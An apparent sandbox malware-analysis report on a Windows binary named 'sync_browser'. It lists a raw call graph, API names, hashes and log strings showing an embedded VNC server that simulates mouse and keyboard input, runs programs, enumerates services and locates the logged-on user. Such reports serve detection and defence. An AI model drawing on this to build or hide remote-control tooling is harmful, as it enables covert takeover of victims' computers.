7ff6dc12dd90 11 API calls 23263->23265 23266 7ff6dc12dd90 11 API calls 23264->23266 23267 7ff6dc12d25f 23264->23267 23269 7ff6dc12d25b 23265->23269 23266->23267 23267->23219 23268 7ff6dc12dd90 11 API calls 23268->23269 23269->23264 23269->23267 23269->23268 23270->23215 23271->23214 24026 7ff6dc0ef8c0 72 API calls _getdrive 24027 7ff6dc0e92c0 119 API calls _RunAllParam 24030 7ff6dc0d7ac0 10 API calls _RunAllParam 24032 7ff6dc0e22c0 114 API calls 5 library calls 24034 7ff6dc0ef6f0 10 API calls _getdrive 24035 7ff6dc0e90f0 EnterCriticalSection LeaveCriticalSection 24036 7ff6dc0ed0f0 DialogBoxParamA 24038 7ff6dc0da6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 24040 7ff6dc0c56e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 24041 7ff6dc0f08e0 117 API calls _RunAllParam 24043 7ff6dc0f1ae0 15 API calls _getdrive 23304 7ff6dc0e4cdb 23520 7ff6dc12d890 97 API calls _RunAllParam 23304->23520 23306 7ff6dc0e4cfc 23307 7ff6dc0e4d52 23306->23307 23374 7ff6dc110650 23306->23374 23521 7ff6dc0ef010 SetEvent 23307->23521 23311 7ff6dc0e7c95 23313 7ff6dc0e7cf7 23311->23313 23314 7ff6dc0e7ca6 FlushFileBuffers 23311->23314 23312 7ff6dc0e7c81 Sleep 23312->23311 23316 7ff6dc0e7d59 23313->23316 23317 7ff6dc0e7d08 FlushFileBuffers 23313->23317 23314->23313 23315 7ff6dc0e7ce6 CloseHandle 23314->23315 23315->23313 23523 7ff6dc12a3b0 93 API calls 2 library calls 23316->23523 23317->23316 23318 7ff6dc0e7d48 CloseHandle 23317->23318 23318->23316 23320 7ff6dc0e7d62 23326 7ff6dc0e7d85 23320->23326 23524 7ff6dc0f2170 16 API calls 23320->23524 23322 7ff6dc0e7d9d CloseDesktop 23325 7ff6dc0e7da7 23322->23325 23329 7ff6dc0e7dbc 23322->23329 23323 7ff6dc0f2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 23367 7ff6dc0e4003 23323->23367 23327 7ff6dc0c3730 _RunAllParam 89 API calls 23325->23327 23326->23322 23326->23329 23327->23329 23328 7ff6dc0e31b0 27 API calls 23328->23367 23331 7ff6dc0c3730 _RunAllParam 89 API calls 23329->23331 23336 7ff6dc0e7dfc GetModuleFileNameA 23331->23336 23332 7ff6dc0ec590 16 API calls 23332->23367 23333 7ff6dc0e419d GetTickCount 23333->23367 23335 7ff6dc0c3730 _RunAllParam 89 API calls 23337 7ff6dc0e4075 OpenInputDesktop 23335->23337 23338 7ff6dc0e7e15 23336->23338 23339 7ff6dc0e7e56 LoadLibraryA 23336->23339 23340 7ff6dc0e7c54 23337->23340 23337->23367 23525 7ff6dc17a140 70 API calls 3 library calls 23338->23525 23343 7ff6dc0e7e6b GetProcAddress 23339->23343 23344 7ff6dc0e7e9d 23339->23344 23348 7ff6dc0c3730 _RunAllParam 89 API calls 23340->23348 23341 7ff6dc12d440 16 API calls 23341->23367 23347 7ff6dc0e7e8f FreeLibrary 23343->23347 23358 7ff6dc0e7edd 23344->23358 23526 7ff6dc0de580 97 API calls _RunAllParam 23344->23526 23345 7ff6dc0c3730 89 API calls _RunAllParam 23345->23367 23346 7ff6dc0e7e26 23346->23339 23347->23344 23349 7ff6dc0e7c72 23348->23349 23349->23311 23349->23312 23353 7ff6dc12d890 97 API calls 23353->23367 23355 7ff6dc0e7c47 CloseDesktop 23355->23340 23355->23349 23357 7ff6dc0e40bf CloseDesktop 23357->23367 23359 7ff6dc0e7fb2 23358->23359 23361 7ff6dc0c3730 _RunAllParam 89 API calls 23358->23361 23360 7ff6dc177220 _getdrive 8 API calls 23359->23360 23362 7ff6dc0e7ff0 23360->23362 23365 7ff6dc0e7f3e 23361->23365 23363 7ff6dc0e4e2e GetSystemMetrics 23363->23367 23364 7ff6dc0e4eb9 GetSystemMetrics 23364->23367 23527 7ff6dc12ab00 95 API calls _RunAllParam 23365->23527 23367->23323 23367->23328 23367->23332 23367->23333 23367->23335 23367->23341 23367->23345 23367->23349 23367->23353 23367->23355 23367->23357 23367->23363 23367->23364 23368 7ff6dc0e4f76 mouse_event 23367->23368 23369 7ff6dc0e4fd3 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 23367->23369 23370 7ff6dc0e50ad GetCursorPos 23367->23370 23516 7ff6dc12a5b0 98 API calls 2 library calls 23367->23516 23517 7ff6dc12a3b0 93 API calls 2 library calls 23367->23517 23518 7ff6dc1295d0 EnterCriticalSection LeaveCriticalSection 23367->23518 23519 7ff6dc0ec6f0 18 API calls _RunAllParam 23367->23519 23522 7ff6dc0ec4e0 93 API calls _RunAllParam 23367->23522 23368->23367 23369->23367 23371 7ff6dc0e50c4 SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA 23370->23371 23372 7ff6dc0e5128 mouse_event 23370->23372 23371->23372 23372->23367 23373 7ff6dc0e5155 SystemParametersInfoA SystemParametersInfoA 23372->23373 23373->23367 23375 7ff6dc0c3730 _RunAllParam 89 API calls 23374->23375 23376 7ff6dc11068e 23375->23376 23377 7ff6dc1109af VkKeyScanA 23376->23377 23380 7ff6dc0c3730 _RunAllParam 89 API calls 23376->23380 23384 7ff6dc11102e 23376->23384 23378 7ff6dc1109c2 23377->23378 23379 7ff6dc0c3730 _RunAllParam 89 API calls 23378->23379 23381 7ff6dc110a08 23379->23381 23382 7ff6dc110743 23380->23382 23386 7ff6dc110a13 23381->23386 23387 7ff6dc110d54 GetKeyState 23381->23387 23389 7ff6dc0c3730 _RunAllParam 89 API calls 23382->23389 23383 7ff6dc11109a 23392 7ff6dc1110ee 23383->23392 23562 7ff6dc112ef0 81 API calls 23383->23562 23384->23383 23385 7ff6dc0c3730 _RunAllParam 89 API calls 23384->23385 23385->23383 23388 7ff6dc110d0a 23386->23388 23391 7ff6dc0c3730 _RunAllParam 89 API calls 23386->23391 23390 7ff6dc110d71 23387->23390 23388->23307 23389->23377 23394 7ff6dc110eaa 23390->23394 23395 7ff6dc110dbf 23390->23395 23397 7ff6dc110a33 23391->23397 23528 7ff6dc111620 23392->23528 23398 7ff6dc0c3730 _RunAllParam 89 API calls 23394->23398 23400 7ff6dc110dc9 GetAsyncKeyState 23395->23400 23401 7ff6dc110e0a 23395->23401 23404 7ff6dc0c3730 _RunAllParam 89 API calls 23397->23404 23407 7ff6dc110fe2 MapVirtualKeyA 23398->23407 23399 7ff6dc1110df 23563 7ff6dc112370 71 API calls 23399->23563 23400->23401 23402 7ff6dc110dd8 MapVirtualKeyA 23400->23402 23405 7ff6dc110e58 23401->23405 23406 7ff6dc110e14 GetAsyncKeyState 23401->23406 23551 7ff6dc0d74c0 18 API calls 23402->23551 23403 7ff6dc111108 23419 7ff6dc11115f GetAsyncKeyState 23403->23419 23438 7ff6dc11111e 23403->23438 23410 7ff6dc110a4b 23404->23410 23413 7ff6dc110e62 GetAsyncKeyState 23405->23413 23414 7ff6dc110eb3 23405->23414 23406->23405 23411 7ff6dc110e24 MapVirtualKeyA 23406->23411 23557 7ff6dc0d74c0 18 API calls 23407->23557 23416 7ff6dc110d37 23410->23416 23417 7ff6dc110a58 23410->23417 23552 7ff6dc0d74c0 18 API calls 23411->23552 23413->23394 23421 7ff6dc110e76 MapVirtualKeyA 23413->23421 23414->23394 23424 7ff6dc110ec6 GetAsyncKeyState 23414->23424 23425 7ff6dc110f17 GetAsyncKeyState 23414->23425 23415 7ff6dc110def 23422 7ff6dc0c3730 _RunAllParam 89 API calls 23415->23422 23426 7ff6dc0c3730 _RunAllParam 89 API calls 23416->23426 23427 7ff6dc110b27 GetAsyncKeyState 23417->23427 23428 7ff6dc110ad4 GetAsyncKeyState 23417->23428 23430 7ff6dc111174 GetAsyncKeyState 23419->23430 23419->23438 23420 7ff6dc111001 23558 7ff6dc1102a0 109 API calls _RunAllParam 23420->23558 23553 7ff6dc0d74c0 18 API calls 23421->23553 23422->23401 23423 7ff6dc11124d MapVirtualKeyA 23565 7ff6dc0d74c0 18 API calls 23423->23565 23424->23394 23439 7ff6dc110eda MapVirtualKeyA 23424->23439 23444 7ff6dc110f27 MapVirtualKeyA 23425->23444 23445 7ff6dc110f62 GetAsyncKeyState 23425->23445 23426->23388 23433 7ff6dc110b77 GetAsyncKeyState 23427->23433 23434 7ff6dc110b3c MapVirtualKeyA 23427->23434 23440 7ff6dc110aec MapVirtualKeyA 23428->23440 23441 7ff6dc110b1e 23428->23441 23429 7ff6dc110e3b 23442 7ff6dc0c3730 _RunAllParam 89 API calls 23429->23442 23430->23438 23443 7ff6dc111184 23430->23443 23433->23441 23450 7ff6dc110b87 MapVirtualKeyA 23433->23450 23536 7ff6dc0d74c0 18 API calls 23434->23536 23435 7ff6dc110e8d 23448 7ff6dc0c3730 _RunAllParam 89 API calls 23435->23448 23437 7ff6dc111151 23437->23423 23438->23423 23438->23437 23554 7ff6dc0d74c0 18 API calls 23439->23554 23535 7ff6dc0d74c0 18 API calls 23440->23535 23452 7ff6dc0c3730 _RunAllParam 89 API calls 23441->23452 23442->23405 23443->23438 23461 7ff6dc0c3730 _RunAllParam 89 API calls 23443->23461 23555 7ff6dc0d74c0 18 API calls 23444->23555 23445->23394 23454 7ff6dc110f72 MapVirtualKeyA 23445->23454 23446 7ff6dc11100a 23559 7ff6dc1102a0 109 API calls _RunAllParam 23446->23559 23448->23394 23449 7ff6dc111267 23449->23449 23537 7ff6dc0d74c0 18 API calls 23450->23537 23460 7ff6dc110bf1 MapVirtualKeyA 23452->23460 23556 7ff6dc0d74c0 18 API calls 23454->23556 23457 7ff6dc110b55 23467 7ff6dc0c3730 _RunAllParam 89 API calls 23457->23467 23459 7ff6dc110ef1 23469 7ff6dc0c3730 _RunAllParam 89 API calls 23459->23469 23538 7ff6dc0d74c0 18 API calls 23460->23538 23471 7ff6dc1111a5 23461->23471 23462 7ff6dc110f40 23472 7ff6dc0c3730 _RunAllParam 89 API calls 23462->23472 23464 7ff6dc110b03 23474 7ff6dc0c3730 _RunAllParam 89 API calls 23464->23474 23465 7ff6dc111013 23560 7ff6dc1102a0 109 API calls _RunAllParam 23465->23560 23476 7ff6dc110b73 23467->23476 23468 7ff6dc110ba0 23477 7ff6dc0c3730 _RunAllParam 89 API calls 23468->23477 23469->23394 23479 7ff6dc111206 23471->23479 23480 7ff6dc1111ba 23471->23480 23481 7ff6dc110f5e 23472->23481 23473 7ff6dc110f8b 23482 7ff6dc0c3730 _RunAllParam 89 API calls 23473->23482 23474->23441 23475 7ff6dc11101c 23561 7ff6dc1102a0 109 API calls _RunAllParam 23475->23561 23476->23433 23477->23441 23478 7ff6dc110c08 MapVirtualKeyA 23539 7ff6dc0d74c0 18 API calls 23478->23539 23488 7ff6dc0c3730 _RunAllParam 89 API calls 23479->23488 23497 7ff6dc1111fd 23479->23497 23487 7ff6dc0c3730 _RunAllParam 89 API calls 23480->23487 23480->23497 23481->23445 23482->23394 23485 7ff6dc111025 23485->23384 23486 7ff6dc110c1f MapVirtualKeyA 23540 7ff6dc0d74c0 18 API calls 23486->23540 23490 7ff6dc1111ce CreateThread CloseHandle 23487->23490 23491 7ff6dc11121a 23488->23491 23490->23497 23564 7ff6dc12a910 116 API calls _RunAllParam 23491->23564 23492 7ff6dc0c3730 _RunAllParam 89 API calls 23495 7ff6dc111230 WinExec 23492->23495 23493 7ff6dc110c36 MapVirtualKeyA 23541 7ff6dc0d74c0 18 API calls 23493->23541 23495->23437 23497->23492 23498 7ff6dc110c53 MapVirtualKeyA 23542 7ff6dc0d74c0 18 API calls 23498->23542 23500 7ff6dc110c6c MapVirtualKeyA 23543 7ff6dc0d74c0 18 API calls 23500->23543 23502 7ff6dc110c89 MapVirtualKeyA 23544 7ff6dc0d74c0 18 API calls 23502->23544 23504 7ff6dc110ca2 MapVirtualKeyA 23545 7ff6dc0d74c0 18 API calls 23504->23545 23506 7ff6dc110cbf MapVirtualKeyA 23546 7ff6dc0d74c0 18 API calls 23506->23546 23508 7ff6dc110cd8 MapVirtualKeyA 23547 7ff6dc0d74c0 18 API calls 23508->23547 23510 7ff6dc110cef 23548 7ff6dc1102a0 109 API calls _RunAllParam 23510->23548 23512 7ff6dc110cf8 23549 7ff6dc1102a0 109 API calls _RunAllParam 23512->23549 23514 7ff6dc110d01 23550 7ff6dc1102a0 109 API calls _RunAllParam 23514->23550 23516->23367 23517->23367 23519->23367 23520->23306 23521->23367 23522->23367 23523->23320 23525->23346 23527->23359 23531 7ff6dc11163b 23528->23531 23529 7ff6dc111665 23529->23403 23531->23529 23566 7ff6dc112f30 23531->23566 23534 7ff6dc11169c 23534->23403 23535->23464 23536->23457 23537->23468 23538->23478 23539->23486 23540->23493 23541->23498 23542->23500 23543->23502 23544->23504 23545->23506 23546->23508 23547->23510 23548->23512 23549->23514 23550->23388 23551->23415 23552->23429 23553->23435 23554->23459 23555->23462 23556->23473 23557->23420 23558->23446 23559->23465 23560->23475 23561->23485 23562->23399 23563->23392 23564->23497 23565->23449 23570 7ff6dc112ff0 23566->23570 23568 7ff6dc111689 23569 7ff6dc112550 71 API calls 23568->23569 23569->23534 23571 7ff6dc177978 81 API calls 23570->23571 23572 7ff6dc113003 23571->23572 23573 7ff6dc113008 23572->23573 23598 7ff6dc17749c 70 API calls std::exception::operator= 23572->23598 23573->23568 23575 7ff6dc113043 23576 7ff6dc182950 RaiseException 23575->23576 23577 7ff6dc113060 GetWindowLongPtrA 23576->23577 23578 7ff6dc1130b9 23577->23578 23585 7ff6dc113140 23577->23585 23580 7ff6dc1131ae SetWindowLongPtrA GetDlgItem 23578->23580 23584 7ff6dc1130c5 23578->23584 23579 7ff6dc113265 EndDialog 23581 7ff6dc1131a7 23579->23581 23582 7ff6dc1131de SendMessageA GetDlgItem 23580->23582 23583 7ff6dc177220 _getdrive 8 API calls 23581->23583 23587 7ff6dc11320f SetForegroundWindow 23582->23587 23586 7ff6dc11328a 23583->23586 23584->23581 23584->23585 23588 7ff6dc11314a GetDlgItem SendMessageA 23584->23588 23589 7ff6dc1130e4 23584->23589 23585->23579 23586->23568 23593 7ff6dc11322e 23587->23593 23590 7ff6dc11318f 23588->23590 23591 7ff6dc113174 SendMessageA 23588->23591 23589->23581 23592 7ff6dc1130ef GetDlgItem SendMessageA 23589->23592 23590->23579 23591->23590 23592->23585 23594 7ff6dc113117 SendMessageA 23592->23594 23595 7ff6dc11323a GetDlgItem EnableWindow 23593->23595 23596 7ff6dc11324d GetDlgItem EnableWindow 23593->23596 23594->23585 23597 7ff6dc113132 23594->23597 23595->23581 23596->23581 23597->23585 23598->23575 23599 7ff6dc0e80da 23618 7ff6dc0d0270 23599->23618 23601 7ff6dc0e81c6 23602 7ff6dc1792a4 __wtomb_environ 70 API calls 23601->23602 23603 7ff6dc0e81e7 CreateRectRgn 23602->23603 23625 7ff6dc0c21e0 23603->23625 23605 7ff6dc0e8211 LoadLibraryA 23606 7ff6dc0e825e 23605->23606 23607 7ff6dc0e8247 GetProcAddress 23605->23607 23608 7ff6dc0c3730 _RunAllParam 89 API calls 23606->23608 23607->23606 23609 7ff6dc0e828f 23608->23609 23610 7ff6dc0c3730 _RunAllParam 89 API calls 23609->23610 23611 7ff6dc0e82f7 23610->23611 23612 7ff6dc177978 81 API calls 23611->23612 23613 7ff6dc0e831e 23612->23613 23614 7ff6dc177978 81 API calls 23613->23614 23615 7ff6dc0e8454 23614->23615 23616 7ff6dc0e8469 23615->23616 23627 7ff6dc0d3fb0 23615->23627 23619 7ff6dc1792a4 __wtomb_environ 70 API calls 23618->23619 23620 7ff6dc0d028f CreateRectRgn 23619->23620 23621 7ff6dc1792a4 __wtomb_environ 70 API calls 23620->23621 23622 7ff6dc0d02b3 CreateRectRgn 23621->23622 23623 7ff6dc1792a4 __wtomb_environ 70 API calls 23622->23623 23624 7ff6dc0d02d7 CreateRectRgn 23623->23624 23624->23601 23626 7ff6dc0c2259 23625->23626 23626->23605 23628 7ff6dc0d3fe1 _snprintf 23627->23628 23629 7ff6dc0d408b GetComputerNameA 23628->23629 23630 7ff6dc0d40d0 LoadLibraryA 23629->23630 23631 7ff6dc0d40a6 23629->23631 23632 7ff6dc0d40fd 23630->23632 23633 7ff6dc0d40e6 23630->23633 23631->23630 23632->23616 23635 7ff6dc0ca040 8 API calls 23633->23635 23635->23632 24045 7ff6dc0c5910 13 API calls _getdrive 24046 7ff6dc0eab10 96 API calls 2 library calls 24047 7ff6dc0d3110 73 API calls 2 library calls 24048 7ff6dc0c9910 11 API calls _getdrive 24049 7ff6dc0ca910 99 API calls _RunAllParam 24050 7ff6dc0d0310 73 API calls free 24052 7ff6dc0f0700 9 API calls 24053 7ff6dc0f5100 82 API calls 2 library calls 22857 7ff6dc0c9d00 22878 7ff6dc0c29a0 22857->22878 22859 7ff6dc0c9db3 OpenSCManagerA 22860 7ff6dc0c9de0 EnumServicesStatusA 22859->22860 22861 7ff6dc0c9dc9 22859->22861 22863 7ff6dc0c9e2b GetLastError 22860->22863 22864 7ff6dc0c9fed CloseServiceHandle 22860->22864 22866 7ff6dc177220 _getdrive 8 API calls 22861->22866 22862 7ff6dc0c9d6b 22862->22859 22863->22864 22865 7ff6dc0c9e3c 22863->22865 22864->22861 22865->22864 22868 7ff6dc0c9e54 EnumServicesStatusA 22865->22868 22867 7ff6dc0ca017 22866->22867 22869 7ff6dc0c9e93 22868->22869 22870 7ff6dc0c9fe1 _RunAllParam 22868->22870 22869->22870 22871 7ff6dc0c9eac OpenServiceA 22869->22871 22870->22864 22871->22870 22872 7ff6dc0c9ecb QueryServiceConfigA 22871->22872 22873 7ff6dc0c9ee5 GetLastError 22872->22873 22874 7ff6dc0c9fc7 CloseServiceHandle 22872->22874 22873->22874 22877 7ff6dc0c9ef4 _RunAllParam 22873->22877 22874->22869 22874->22870 22875 7ff6dc0c9f08 QueryServiceConfigA 22875->22877 22876 7ff6dc0c29a0 81 API calls 22876->22877 22877->22874 22877->22875 22877->22876 22879 7ff6dc0c2a17 22878->22879 22883 7ff6dc0c29bd 22878->22883 22880 7ff6dc0c2a29 22879->22880 22897 7ff6dc1770b4 71 API calls std::exception::exception 22879->22897 22884 7ff6dc0c2a42 22880->22884 22898 7ff6dc0c3050 81 API calls std::exception::exception 22880->22898 22883->22879 22885 7ff6dc0c29e6 22883->22885 22884->22862 22886 7ff6dc0c2d12 22885->22886 22899 7ff6dc177110 71 API calls std::exception::exception 22885->22899 22888 7ff6dc0c2d41 22886->22888 22889 7ff6dc0c2d22 22886->22889 22891 7ff6dc0c2d53 22888->22891 22902 7ff6dc1770b4 71 API calls std::exception::exception 22888->22902 22900 7ff6dc0c2fb0 71 API calls 22889->22900 22896 7ff6dc0c2d3c 22891->22896 22903 7ff6dc0c3050 81 API calls std::exception::exception 22891->22903 22892 7ff6dc0c2d2f 22901 7ff6dc0c2fb0 71 API calls 22892->22901 22896->22862 22897->22880 22898->22884 22899->22886 22900->22892 22901->22896 22902->22891 22903->22896 24055 7ff6dc0cf700 280 API calls 2 library calls 24056 7ff6dc0d2d00 24 API calls 24057 7ff6dc0f34f7 10 API calls _getdrive 24058 7ff6dc0cff30 11 API calls _getdrive 24061 7ff6dc0da130 173 API calls 4 library calls 24062 7ff6dc0e3530 120 API calls 2 library calls 24063 7ff6dc0f3523 92 API calls 2 library calls 24069 7ff6dc0e4003 242 API calls 2 library calls

                                                                    Executed Functions

                                                                    Function 00007FF6DC0E36D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895librarythreadsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                    • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                    • API String ID: 459429253-3399855497
                                                                    • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction ID: 20d5a5b8565e7fbf19c094270eb1dd6075f7dd5da39ee2c9c9567dc5cca3692a
                                                                    • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction Fuzzy Hash: 6FA2BE26A08A9585EB50DB29C848BFE37A9FB84B94F054233CA1DC77E5DF39D466C700
                                                                    Function 00007FF6DC129BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105libraryloaderprocessCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                    • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                    • API String ID: 1881659197-3751679782
                                                                    • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                    • Instruction ID: 2aff956bbc103b7c7b30e4e742720fd9899d5f0b5ada1f13c88b593c6c917c48
                                                                    • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                    • Instruction Fuzzy Hash: 53416135A1C76A86EA249F15BC1427DA3A8FF49790F444232D95E87794DF3CE527CB00
                                                                    Function 00007FF6DC129EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF6DC129F3B
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF6DC12A06F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF6DC12A01F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF6DC129F7F
                                                                    • vncservice.cpp : getusername error %d, xrefs: 00007FF6DC12A04A
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF6DC12A094
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF6DC129FB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                    • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                    • API String ID: 3635673080-2232443292
                                                                    • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                    • Instruction ID: d59d29197a0fb7583ff85a5b317e0efc61ba7422e24584fefb2ac611cc7779d3
                                                                    • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                    • Instruction Fuzzy Hash: CD41AD64E1C66B82EB508B28FC552BDA3A9BF95708F940033DA0DC2265EF3DE4678700
                                                                    Function 00007FF6DC0C9D00 Relevance: 15.2, APIs: 10, Instructions: 209serviceCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
